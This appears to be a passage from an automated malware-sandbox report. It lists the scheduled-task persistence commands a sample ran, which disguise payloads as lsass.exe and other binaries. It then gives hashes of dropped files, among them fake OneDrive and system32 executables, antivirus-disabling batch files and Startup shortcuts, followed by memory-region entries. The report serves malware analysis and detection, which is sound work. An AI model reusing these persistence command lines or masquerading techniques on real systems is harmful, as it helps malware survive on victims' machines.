                                                                  schtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 10 /tr "'C:\HypercomponentCommon\InstallAgent.exe'" /rl HIGHEST /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:3848
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:672
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:2348
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:1940
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 14 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:3708
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "hyperSurrogateagentCrt" /sc ONLOGON /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:3048
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 5 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:4444

                                                                Network

                                                                MITRE ATT&CK Enterprise v15

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe

                                                                  Filesize

                                                                  220B

                                                                  MD5

                                                                  47085bdd4e3087465355c9bb9bbc6005

                                                                  SHA1

                                                                  bf0c5b11c20beca45cc9d4298f2a11a16c793a61

                                                                  SHA256

                                                                  80577e4666fad86273b01f60b8d63c15e4ce37774575ac1e0df7a7c396979752

                                                                  SHA512

                                                                  e74dd8e9756cab1123410a46609dc91540cc29a8fea93017155746f7bb9b7a41bfd3d7595a62788264bedceb475b2a733cce9b70f37cc4478302d5fc228d7684

                                                                • C:\HypercomponentCommon\cemEzm0xYx1.bat

                                                                  Filesize

                                                                  105B

                                                                  MD5

                                                                  5ee2935a1949f69f67601f7375b3e8a3

                                                                  SHA1

                                                                  6a3229f18db384e57435bd3308298da56aa8c404

                                                                  SHA256

                                                                  c24a0d7f53a7aa3437f6b6566d3aaebdb36053b64e72cbd1d3796596fc8e3c06

                                                                  SHA512

                                                                  9777fcb9ee8a8aa0c770c835c5f30aff6efc5fb16a1819047e13d580d748703ffcb446db110067fb2546a637213cb8f25416d4b621a95a789b8e113d31d3401a

                                                                • C:\HypercomponentCommon\hyperSurrogateagentCrt.exe

                                                                  Filesize

                                                                  1.9MB

                                                                  MD5

                                                                  7be5cea1c84ad0b2a6d2e5b6292c8d80

                                                                  SHA1

                                                                  631e3de0fe83ebacbe5be4e7f895dd0bd8b095ce

                                                                  SHA256

                                                                  6eb90684ebc56fb2713f5c468b55a964625ec2af698d9687492b1de4225693b7

                                                                  SHA512

                                                                  ea58d3b1664fe70968635c2722e19ce65ce4c1d66c68aed2d98441e60e773c7295f18d9c99cf4c454c510f33f5e37d3d2c0053b7434a46c542a0d63a4cc03647

                                                                • C:\ProgramData\mntemp

                                                                  Filesize

                                                                  16B

                                                                  MD5

                                                                  14c709cc22e8c1a80f9d4375234a594b

                                                                  SHA1

                                                                  960a6ffb980476ae48eae378912f193fd64cecbb

                                                                  SHA256

                                                                  dc67cf8499ad8b4bbc53649a62b144eea07d3e288de9bd4f2f8fa7b6777ee256

                                                                  SHA512

                                                                  49637ce4eb4412b5aa8ac94bf29d130ac9d5d8c20554dd559e47a2d1afd9bf13d9d59e7a5ae52d729c4add79cc72b6c03f50c998dcc61eb6c0482d1b9d4bb688

                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                  Filesize

                                                                  3KB

                                                                  MD5

                                                                  ad5cd538ca58cb28ede39c108acb5785

                                                                  SHA1

                                                                  1ae910026f3dbe90ed025e9e96ead2b5399be877

                                                                  SHA256

                                                                  c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

                                                                  SHA512

                                                                  c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  2c59a3c90f0c16d346f8c4f4df64a6c6

                                                                  SHA1

                                                                  324099be473da754fe733c61e2e536e550f1d45c

                                                                  SHA256

                                                                  17da3cfdee18f36a8ed7f5213e0829096fffc6546555ec381e06ada83388beb0

                                                                  SHA512

                                                                  31d54490518b88d44ec2916a1571a21b8a9db0bfc7e680cfc492c942cf81b58c32be929acfd30e14bd0b85e131d752f3c3a695a62bc5e002f761f3c8e0f1df7a

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  18KB

                                                                  MD5

                                                                  ae8991710860c8b00be1fcd68d547af3

                                                                  SHA1

                                                                  47fd00b85575b41b85c320c07264d3e8e633c77a

                                                                  SHA256

                                                                  51baa2b91bd904001767a453a311292a9f8ccfea9fc2a7269bb5d6a60e2718d8

                                                                  SHA512

                                                                  62286172c1484909793b464ef58232f7bc7c0f22d46841385a94bd9c66095449aaf5124cc2a767a73decb70099d128574ac940ad7cc094cce44ec875f52b3d30

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  18KB

                                                                  MD5

                                                                  2cf01657c5ac27eefa6b3ff4e35a1a50

                                                                  SHA1

                                                                  584fa6162040238a9d8453d1a4918ebe1554d017

                                                                  SHA256

                                                                  a39ea6c97f8ae7ae41b4e9d83e157272ec8af818545e11c20874461d60c505e3

                                                                  SHA512

                                                                  0c3a5abb0d3d3e6efc65107eae636473160ad45209e09d7c0ec53c1d5d8547322ddc04b12a12ef3a2bb51436ccec2280f15ec854f49e2b48c99ebef7cd8965df

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  18KB

                                                                  MD5

                                                                  f7ea30d73e4d35c4935deda299f2d925

                                                                  SHA1

                                                                  aac6976e4536461524cff5dcdd6dd4d6d7e52b99

                                                                  SHA256

                                                                  e50aa0aaf00a10a794501ba32af98dab0dc31ce3f355d745d269f10e4779d177

                                                                  SHA512

                                                                  9c1b6a2e2f5bc29b45e2b6913085ac60907ab718486148a9d5610bedf4bb4dfa0aff3eced0247f83b2fd5015ba84db7b86b6b553703ba43f14341ef07626f5f7

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  18KB

                                                                  MD5

                                                                  1509353d6b4376f57775e46c90c8d6b8

                                                                  SHA1

                                                                  de1394d6aecb38616999659259e207d089e98372

                                                                  SHA256

                                                                  8b51849411465e45a663eb9a84d3d2bcfd0a344fa6509672500291a5ecf3008b

                                                                  SHA512

                                                                  df4b7adb24ff38b11f80587f05bbf9d0aff0dc940b93de02ef22f924b6b4f62ccd809c8ed8a60007aeb3057525d5ebf63f6652a1ddd29403f79a6b83e0287dc0

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  18KB

                                                                  MD5

                                                                  05575f9847eab32a3ae3a2a5dc78ec64

                                                                  SHA1

                                                                  8598c7e28d3daaef3a737dbe2585ee9e61db0541

                                                                  SHA256

                                                                  5454f7eccff362c9bfb12516b89c100881b37a2adbcf6141c836545612406439

                                                                  SHA512

                                                                  08d0e49d7d8bc8dd0de5a52dbcc69c4dbd91cbf8136381db4b60e316fdd7639f97fc4f49dc97fc464e2350579ff0bd564698656f06115a7adee261df4bd168f8

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  18KB

                                                                  MD5

                                                                  f367e99761c46581dfcbfef8892da37e

                                                                  SHA1

                                                                  9e50ab1db5663eec09cd9fb3e23347b2be1ae82d

                                                                  SHA256

                                                                  5ff7a2f567fd356af30d71f263933fdf8b5772e95d715210d921ddda4945c379

                                                                  SHA512

                                                                  059bc34c9ff1158c6ef144dbdc8cff65445f3beb96abc5b1dc3a28c7df2816f6b74cbd22dcc15507b15e78a169a366c0f9e5650f443100ec453bfbd21680987b

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  16KB

                                                                  MD5

                                                                  2a79a13a4ea5ccdf4eeee7d442cf2663

                                                                  SHA1

                                                                  89f107ff1f621aca03587b51ccaaf31dd6080b27

                                                                  SHA256

                                                                  b71a54776d8d86515b7162e2c6bd2a4a2064e397a7b784e0bcf146ab6e0262c8

                                                                  SHA512

                                                                  001213bd26488f83c19dff713e60669ea65cf1c5c3bb5f70274cec9085aab407ae6c46ba74c5455a720c1980a984f8e23cf3823d0420b1490eaf44387b2188a9

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  1KB

                                                                  MD5

                                                                  453fbb8c24446e8c2866d75fb15cf79d

                                                                  SHA1

                                                                  a8ed973fc1ae3ab3dab0d7d8720aa4551d6f94db

                                                                  SHA256

                                                                  a206b98d3a6497468dcbd2015bee85e502cf1cd00622f58e2c0662bd3eab1c02

                                                                  SHA512

                                                                  7089483a0a72b5fefb4a428a1abcf236d1af16f78a1ed2763005dd69660298c07d2a6486d3c61d15cdaadb04b67aa0c8fc4fcfe249c4127838cc67299161403e

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  18KB

                                                                  MD5

                                                                  a922e764097197903640efa7cb48b7b0

                                                                  SHA1

                                                                  01053c471ac8b5bc110f2550a043858b2335892c

                                                                  SHA256

                                                                  7676746b276555a4d24911093edfc63c5079565126dc648fd60f524c405c6ffa

                                                                  SHA512

                                                                  7f7db14d0e534d6955652887d3f97c232bf2fb567ae9c6e0f550d50b663081b2fc7376f449d2c9755ad426070ac3443c0575b803f753e0b7521a90e7650fd01a

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  18KB

                                                                  MD5

                                                                  529e7b9888cac6f819e1de74861a94bb

                                                                  SHA1

                                                                  b3f130d2e2089d5beab16428e71685a37e60d2b3

                                                                  SHA256

                                                                  37a6ca8c754e10e25ecb16030183a8fc38b619c11f381b275dbc522f49f97cf8

                                                                  SHA512

                                                                  c3b65e7896dae2589669086e73c98ad479087f2d18e6739f1dd8ff620f614c1dcea4a093c102e4687bb8f228714847c4a3d27993cf2444fd6a9a6d4dd3bc25d1

                                                                • C:\Users\Admin\AppData\Local\Temp\31rB2fmfHH.bat

                                                                  Filesize

                                                                  157B

                                                                  MD5

                                                                  c13c2f43d400c687fc382dae619197d1

                                                                  SHA1

                                                                  14e8ec70bbdf707c7a3ddced57d66dab6ba336dc

                                                                  SHA256

                                                                  373e74f0529515e7527e9713e7c063c6ae347f344aa79867eeb4319839d93094

                                                                  SHA512

                                                                  931feedaaf9a9dd8ea6dc47c8433327b2612f2cbe1a9dd330ac89306a7338205e5ae69ee63cd1321c0a14185a2272dc54c11489cc2ba49abd06f6ac76dfbd3c2

                                                                • C:\Users\Admin\AppData\Local\Temp\33WHFCVS57NXGIT.exe

                                                                  Filesize

                                                                  2.2MB

                                                                  MD5

                                                                  05d87a4a162784fd5256f4118aff32af

                                                                  SHA1

                                                                  484ed03930ed6a60866b6f909b37ef0d852dbefd

                                                                  SHA256

                                                                  7e3d0dabaded78094abfac40d694eaebf861f3cb865d3835bb053d435e996950

                                                                  SHA512

                                                                  3d4ce511e9671d8bfa15e93d681fedd972f4fe4c09ac9cfd9653afe83e936654c88ee515a76e7ac80e8f34868802e68c6531fdea0b718029d2196ad1425981fc

                                                                • C:\Users\Admin\AppData\Local\Temp\FunChecker.bat

                                                                  Filesize

                                                                  3KB

                                                                  MD5

                                                                  42afdea7c75bc9074a22ff1be2787959

                                                                  SHA1

                                                                  24bc20691a1e99e2cf0b2bca78694701fa47720a

                                                                  SHA256

                                                                  3d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2

                                                                  SHA512

                                                                  d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9

                                                                • C:\Users\Admin\AppData\Local\Temp\HPN42SDD8UHTLWI.exe

                                                                  Filesize

                                                                  185KB

                                                                  MD5

                                                                  e0c8976957ffdc4fe5555adbe8cb0d0c

                                                                  SHA1

                                                                  226a764bacfa17b92131993aa85fe63f1dbf347c

                                                                  SHA256

                                                                  b8260ac46e03f2a7baa9ae01bee5443d16d9eb96f6ee8588a887d6de72a750d4

                                                                  SHA512

                                                                  3a1ea48e81ebfd5586938a72afd68bcc48d4c5d69949cfdacf33aee3371d98f202443f5db12bac876ca7cecc982ddc56827f8d9b1857d22bda71242d5b2cc71e

                                                                • C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe

                                                                  Filesize

                                                                  2.1MB

                                                                  MD5

                                                                  c9805a18753f074961692ba5d93173d9

                                                                  SHA1

                                                                  3735c69e4a6a85f422b1cd4c6e7c6e1b35a5600b

                                                                  SHA256

                                                                  9941d87b8bc2fdc1600b82c60d3679a0481f571cd41fe2841cc6058c1eb7d8e6

                                                                  SHA512

                                                                  84cac01b222fa4357086ed5489759b59a8aac79c02d7706007c9f39eb1cbc3a3765701d64d0fcf1f4eafc6124aff15673fd73177631c60d30101cacd2a8b77b2

                                                                • C:\Users\Admin\AppData\Local\Temp\RES71D0.tmp

                                                                  Filesize

                                                                  1KB

                                                                  MD5

                                                                  e36b68e724c9168b8b8458d909a9f058

                                                                  SHA1

                                                                  a28c221b3ad81d53a9daf2f3746c6f28563c0309

                                                                  SHA256

                                                                  4b4832dc517de125a891219234b3a4dd71071b63ada622437fa7c0b1bb83830d

                                                                  SHA512

                                                                  8e8d17c29706d6f14d57635022ba2c10dc54b9c3bf36dfc1c58b97d43bc6a59659c950a589d7b17b18c3e0c41ca20ae4447f0e0bba9b6d9aea1d4245a484a143

                                                                • C:\Users\Admin\AppData\Local\Temp\RES721E.tmp

                                                                  Filesize

                                                                  1KB

                                                                  MD5

                                                                  80aafe09229c57b1afbb4d4409875f66

                                                                  SHA1

                                                                  e3075cdca29893a33c6a6815796fa9b5ae274e31

                                                                  SHA256

                                                                  fb0696a786e06b2bebb77c5e3d9cdda752770c54839e87d9005255663c466676

                                                                  SHA512

                                                                  ad2c431b494d23b0fc7a4279ee60b676f0dfc24f58caae782b4ff7a4f184cc1b97bd55e3c96948d1d04b910f0bdbbcd2e68a1370189cb6bcb2605c1b26318221

                                                                • C:\Users\Admin\AppData\Local\Temp\XClient.exe

                                                                  Filesize

                                                                  2.2MB

                                                                  MD5

                                                                  26bd039b1fb29f388adf79135f5ba40e

                                                                  SHA1

                                                                  d144e02494343f05d84326ac384709d824bf7953

                                                                  SHA256

                                                                  cc32a9b2888305b8854017914aec48af2e8f35402ce72f95efbd86627d9df466

                                                                  SHA512

                                                                  5eb35f8df5142471154ea3b7e0cc3df776b576b0818bf4ee5134e4e3edc94608b9c15a6f5131b97ee19f85c55fba6ec15fa5783167074d3778a82156ccb3ab57

                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wk4gpylm.ngy.ps1

                                                                  Filesize

                                                                  1B

                                                                  MD5

                                                                  c4ca4238a0b923820dcc509a6f75849b

                                                                  SHA1

                                                                  356a192b7913b04c54574d18c28d46e6395428ab

                                                                  SHA256

                                                                  6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                  SHA512

                                                                  4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                • C:\Users\Admin\AppData\Local\Temp\anti_pros_disp.bat

                                                                  Filesize

                                                                  842B

                                                                  MD5

                                                                  ee877037203d8c16d52690baaecfb371

                                                                  SHA1

                                                                  3f2401fb6c9bbf85b62deeb082e2ea699a936863

                                                                  SHA256

                                                                  cbc33d31c79dfe89a693a7c9d63fa546ae7ccc40514bb074c2ab61a16baa45b6

                                                                  SHA512

                                                                  f32061ab690ebd313d44befeef2e6ffb06b30fd3ece7a09d57aff142d0c9507562275f6efce23c9a199324ff77ed98d3641596fd80eb3e2adebcb031473dbfa8

                                                                • C:\Users\Admin\AppData\Local\Temp\avdisable.bat

                                                                  Filesize

                                                                  3KB

                                                                  MD5

                                                                  4c35b71d2d89c8e8eb773854085c56ea

                                                                  SHA1

                                                                  ede16731e61348432c85ef13df4beb2be8096d9b

                                                                  SHA256

                                                                  3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42

                                                                  SHA512

                                                                  a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d

                                                                • C:\Users\Admin\AppData\Local\Temp\clear_av.bat

                                                                  Filesize

                                                                  5KB

                                                                  MD5

                                                                  48d1db006fe2ae378b0f7efd561d7e56

                                                                  SHA1

                                                                  63df10216f0ad81d1d42dd2fc8c4483be5d077fc

                                                                  SHA256

                                                                  65428112138dff324acd39babd902959dbb78b6ed74a276a1d3c9993ae52847a

                                                                  SHA512

                                                                  079fa75df35b8fea18fb220b3f005d6384b28aedb2e5ae62ddd3f6db6abda7dbab091fd44d05dffb4ec41657e052f379267eef7c5126fd8bd7eb189f147806f5

                                                                • C:\Users\Admin\AppData\Local\Temp\system32.exe

                                                                  Filesize

                                                                  2.3MB

                                                                  MD5

                                                                  b198b92325d73a7b4994a481be7cf337

                                                                  SHA1

                                                                  1b1d72d1a5ac6e90c8daaa160b210903cfc76f5c

                                                                  SHA256

                                                                  e5c0819c18a018b6e77e27c9c7d05050dd8a45c0a2bd8ab08aaf19fff35c3c92

                                                                  SHA512

                                                                  d18316f3c5ef53716ba26bc01105ef4192cf94fd04e02fb3433222962649d279e8052305f101d516617821c620e8c189379f143333a6995f51de1a4f168a56a9

                                                                • C:\Users\Admin\AppData\Roaming\HPN42SDD8UHTLWI.exe

                                                                  Filesize

                                                                  4KB

                                                                  MD5

                                                                  77ee0bdc12ed03db0e80ba463609f0cc

                                                                  SHA1

                                                                  c8e6d679f24ced10279403c6457398bb7abbb68c

                                                                  SHA256

                                                                  a75aa902dee49a7ae819ad9604422cb11ac76a7d552b3118af0862a476c03b1a

                                                                  SHA512

                                                                  a85b1faa6a1959b261a062cb67accb3bf3ec891a6e85d30d5e445764b393850b77591cfcd4c006b20c553ead9222a77e4f6966f5b534eaccd527e1f7cdb5e6bc

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunCheker.lnk

                                                                  Filesize

                                                                  816B

                                                                  MD5

                                                                  52682f0fbf22b7d555cfe3f8ad119830

                                                                  SHA1

                                                                  ca4ce7196bcf488cc211693691857f9a5290163c

                                                                  SHA256

                                                                  7499a56db1406cdbea03f5ee453bde3f7feb6977dac83a64fdc1b6015670d063

                                                                  SHA512

                                                                  8901461fae327b9c252d581e77a9ca35e5a6d52fae435a49e4fbd237aaead9bb3d89787212b88b91e630a8c85aeb038e8b79cc6020f0d92d601b648dd6d9cb87

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HPN42SDD8UHTLWI.lnk

                                                                  Filesize

                                                                  813B

                                                                  MD5

                                                                  4c081842c1f6cd15fb96b1af808b5717

                                                                  SHA1

                                                                  8f5b7f08aea4b3eb9b6aab828902faa149a40e28

                                                                  SHA256

                                                                  8a0c0ec3d2c3745317a2dc13efdec2fb28cdbf0d2359c0da9ebe2f5c7dc5e56b

                                                                  SHA512

                                                                  73dda4cd8686a6032089a8a22b6e81d3aba60dcf1d16c6cc5920661dec6a097a826a657d234dbdbe3283f4dd794cc80cec2b4844382e24b9b51aed766f4a623c

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft OneDrive.lnk

                                                                  Filesize

                                                                  673B

                                                                  MD5

                                                                  ac929452781475808dc56ff75bb33cae

                                                                  SHA1

                                                                  6cfe58874ce73cb46332a6cce7f75a2e5485ac3a

                                                                  SHA256

                                                                  79fccedf471fe028b7c4256cd0fe780fca184a2e0e63c424a98390a92c86d3bf

                                                                  SHA512

                                                                  0580ef74b8bc084f09c011a5db979c4a5c31dbe6b889cfbc8954f1238d4ee8c4a400a787688e7d25a69de33cc84a41bef209c39a452a1795307e6017f97142ca

                                                                • C:\windows\system32\p6rbzy.exe

                                                                  Filesize

                                                                  4KB

                                                                  MD5

                                                                  b8a116c4221365515a14bb752ccf7677

                                                                  SHA1

                                                                  012f1860d8fe109f0c7bd2c1aee9c90a1b7c6040

                                                                  SHA256

                                                                  03d077be7ba63bccb8407b09ae27dcd947dd5cf92268fc5b7444eecf3f4d1946

                                                                  SHA512

                                                                  cf511769f70622f62a84f08a6b415a5e7ae13e7c59a3142a7fdc4b86b3d3a5285079d8eca5edc99b75fb5fcb5669d554983e04d007b103d6e1943867d54b3866

                                                                • \??\c:\Users\Admin\AppData\Local\Temp\ilftiht0\ilftiht0.0.cs

                                                                  Filesize

                                                                  371B

                                                                  MD5

                                                                  559234acd442472188f2fda70950c3a0

                                                                  SHA1

                                                                  79321bd826d2989e7e32547577740c7aa3fddfcb

                                                                  SHA256

                                                                  0b8dc6f6653ad4d8981e791419b3281a60c4fff96d1e649eaaad598e32b0a7e0

                                                                  SHA512

                                                                  057305a23a429e8933be4f9a9dc316712bb8d83e25b11c3ec030cce9de79886d675b38291c0f309b5a3c664e43055e023f3f04d7433557eb10cfd32c99384769

                                                                • \??\c:\Users\Admin\AppData\Local\Temp\ilftiht0\ilftiht0.cmdline

                                                                  Filesize

                                                                  235B

                                                                  MD5

                                                                  2b2dffe8ae05abb5f34f88ad97e22247

                                                                  SHA1

                                                                  7141801fcc63790d0752e54c4e481e31b9d084f9

                                                                  SHA256

                                                                  e2e76d8b61003718b7ec54616d958ddd7a1dfb8fe9d9b6f1b71c395677f297dd

                                                                  SHA512

                                                                  1a2828b6e4937aeb486dff04385cdf0cce3285bbe28f360eb9c5d66db923fe6b918fd76f92c8e4f5977d04038a926a1c91ef291e103c05f81b99333b978c79d5

                                                                • \??\c:\Users\Admin\AppData\Local\Temp\kleghtlu\kleghtlu.0.cs

                                                                  Filesize

                                                                  391B

                                                                  MD5

                                                                  f6d1f142458e7c3718610ef2b323f7ee

                                                                  SHA1

                                                                  163a049f644ac62c26166ad7b23307a1e6b853cd

                                                                  SHA256

                                                                  6013e1a7d20726dd5e941816db301dc06933a63a27fb204c0b0b40e4e91ad4d6

                                                                  SHA512

                                                                  5f23ff5dfe4eec1d70e48ebc223b87ecd088af37067633f3c13a66b8b12482ea47a941a5e042df503a852370967a3b39c7cce4635b73fc66ed0f3c844d6fc5b8

                                                                • \??\c:\Users\Admin\AppData\Local\Temp\kleghtlu\kleghtlu.cmdline

                                                                  Filesize

                                                                  255B

                                                                  MD5

                                                                  b104ffcf534068ffb3d56b93d0fb7c48

                                                                  SHA1

                                                                  461952515633141e23baf549b2583c163a11dc1c

                                                                  SHA256

                                                                  bcced5c1de5776465a6312ed10df978263d1f1aa08fe96877d6577b67fb5c6b0

                                                                  SHA512

                                                                  f19e63ae16e6ad74fc6c9d02501e427ef85df2123c91de0b74dea92c2f355294d15e7eae19f13fe90a74b3147aef52d5be8589d602893c0e289614765bc1507b

                                                                • \??\c:\Users\Admin\AppData\Roaming\CSCF6D6BC8FAF0144D5922F1843B23DA98E.TMP

                                                                  Filesize

                                                                  1KB

                                                                  MD5

                                                                  8aadea16c6baa9d0c36f61aabe77f961

                                                                  SHA1

                                                                  85345d2cb14acb099d362e56a9217eefd78f6a4a

                                                                  SHA256

                                                                  66f7da5dea9c6218d7093e2ff4195913143e7a1521752f0057df7435771255e1

                                                                  SHA512

                                                                  53b4b5cc9acb21a155cd3f7d950f74ff17c9c6e6db9cd1c85020ae02aeb677121b384570deef9e9286af48e9c4f3cb80eb8a83e613f6e88cd6c68d67ff642a18

                                                                • \??\c:\Windows\System32\CSC9F2BFC5A824449828879E6BA61F831F8.TMP

                                                                  Filesize

                                                                  1KB

                                                                  MD5

                                                                  7b43d55bce13fe38cf60f702f1abb654

                                                                  SHA1

                                                                  eca0170bd25e4a4b7fa76fefd5236fcd5e666aa0

                                                                  SHA256

                                                                  b04dfcba2ffb92d972d0e4eea3295f2b3df5ea60810507166f37765b5f4b8bdc

                                                                  SHA512

                                                                  5489aeb50085bdf56e10a7d7115f93185a28d6cb7a9a69f01ef65a39e387997e3ffe55de7e732d3b9e446c5998ea98bf64dde70fc9b3c85d0e1084f7da1a5972

                                                                • memory/64-833-0x00000000703B0000-0x00000000703FB000-memory.dmp

                                                                  Filesize

                                                                  300KB

                                                                • memory/664-2356-0x0000000000F60000-0x0000000000F6E000-memory.dmp

                                                                  Filesize

                                                                  56KB

                                                                • memory/664-2351-0x0000000000F80000-0x0000000000F9C000-memory.dmp

                                                                  Filesize

                                                                  112KB

                                                                • memory/664-2349-0x0000000000F40000-0x0000000000F4E000-memory.dmp

                                                                  Filesize

                                                                  56KB

                                                                • memory/664-2354-0x0000000000FA0000-0x0000000000FB8000-memory.dmp

                                                                  Filesize

                                                                  96KB

                                                                • memory/664-2358-0x0000000000F70000-0x0000000000F7C000-memory.dmp

                                                                  Filesize

                                                                  48KB

                                                                • memory/664-2345-0x0000000000520000-0x0000000000706000-memory.dmp

                                                                  Filesize

                                                                  1.9MB

                                                                • memory/664-2352-0x0000000000FF0000-0x0000000001040000-memory.dmp

                                                                  Filesize

                                                                  320KB

                                                                • memory/832-1819-0x00000000703B0000-0x00000000703FB000-memory.dmp

                                                                  Filesize

                                                                  300KB

                                                                • memory/1120-824-0x00000000703B0000-0x00000000703FB000-memory.dmp

                                                                  Filesize

                                                                  300KB

                                                                • memory/2660-43-0x0000000007D10000-0x000000000820E000-memory.dmp

                                                                  Filesize

                                                                  5.0MB

                                                                • memory/2660-42-0x0000000007770000-0x0000000007802000-memory.dmp

                                                                  Filesize

                                                                  584KB

                                                                • memory/2660-23-0x0000000000C80000-0x000000000126A000-memory.dmp

                                                                  Filesize

                                                                  5.9MB

                                                                • memory/2660-41-0x0000000000C80000-0x000000000126A000-memory.dmp

                                                                  Filesize

                                                                  5.9MB

                                                                • memory/2660-39-0x0000000000C80000-0x000000000126A000-memory.dmp

                                                                  Filesize

                                                                  5.9MB

                                                                • memory/2660-1239-0x0000000009240000-0x000000000925E000-memory.dmp

                                                                  Filesize

                                                                  120KB

                                                                • memory/2660-1222-0x0000000009070000-0x00000000090C0000-memory.dmp

                                                                  Filesize

                                                                  320KB

                                                                • memory/2660-2306-0x0000000000C80000-0x000000000126A000-memory.dmp

                                                                  Filesize

                                                                  5.9MB

                                                                • memory/2660-2256-0x0000000009230000-0x000000000923A000-memory.dmp

                                                                  Filesize

                                                                  40KB

                                                                • memory/2660-2257-0x0000000009620000-0x0000000009632000-memory.dmp

                                                                  Filesize

                                                                  72KB

                                                                • memory/2992-45-0x0000000000CA0000-0x0000000001224000-memory.dmp

                                                                  Filesize

                                                                  5.5MB

                                                                • memory/2992-46-0x0000000007960000-0x00000000079FC000-memory.dmp

                                                                  Filesize

                                                                  624KB

                                                                • memory/2992-44-0x0000000000CA0000-0x0000000001224000-memory.dmp

                                                                  Filesize

                                                                  5.5MB

                                                                • memory/2992-30-0x0000000000CA0000-0x0000000001224000-memory.dmp

                                                                  Filesize

                                                                  5.5MB

                                                                • memory/2992-2311-0x0000000000CA0000-0x0000000001224000-memory.dmp

                                                                  Filesize

                                                                  5.5MB

                                                                • memory/3048-80-0x0000000008E00000-0x0000000008E1E000-memory.dmp

                                                                  Filesize

                                                                  120KB

                                                                • memory/3048-86-0x0000000009140000-0x00000000091D4000-memory.dmp

                                                                  Filesize

                                                                  592KB

                                                                • memory/3048-51-0x0000000004280000-0x00000000042B6000-memory.dmp

                                                                  Filesize

                                                                  216KB

